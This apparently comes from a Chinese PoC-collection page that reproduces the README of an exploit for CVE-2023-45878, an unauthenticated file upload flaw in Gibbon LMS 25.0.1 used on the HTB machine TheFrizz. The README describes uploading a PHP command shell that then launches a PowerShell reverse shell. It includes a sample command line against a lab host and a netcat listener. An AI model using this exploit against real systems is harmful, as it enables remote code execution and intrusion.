关联漏洞
标题:
Gibbon 安全漏洞
(CVE-2023-45878)
描述:Gibbon是一个解决教育工作者每天遇到的实际问题的学校平台。 GibbonEdu Gibbon 25.0.1版本存在安全漏洞,该漏洞源于允许未经身份验证的攻击者将任意文件上传到应用程序,并在底层系统上执行代码。
介绍
# CVE-2023-45878
Wrote this script based on the work of https://herolab.usd.de/security-advisories/usd-2023-0025/ . The exploit works by using an Arbitrary File Write exploit in Gibbon LMS 25.0.1 . This PoC will use upload a simple php cmd script, and then use that to load a powershell revshell.
```Example
python3 CVE-2023-45878.py -u http://frizzdc.frizz.htb/Gibbon-LMS -l 10.10.16.2 -p 8888 -f asdf
```
Flags:
```
-u, URL where Gibbon LMS is installed.
-l, your IP
-p, your open port
-f, filename. Important if you need to manually test. Default is "asdf".
```
Have a listener ready for the incoming shell.
```
nc -lvnp 8888
```
This was used for TheFrizz on HTB, submitted by 0xPizzaCat.
文件快照
[4.0K] /data/pocs/28639c2b0241bff1b5434af3948a130cf92cdd46
├── [5.1K] CVE-2023-45878.py
└── [ 699] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。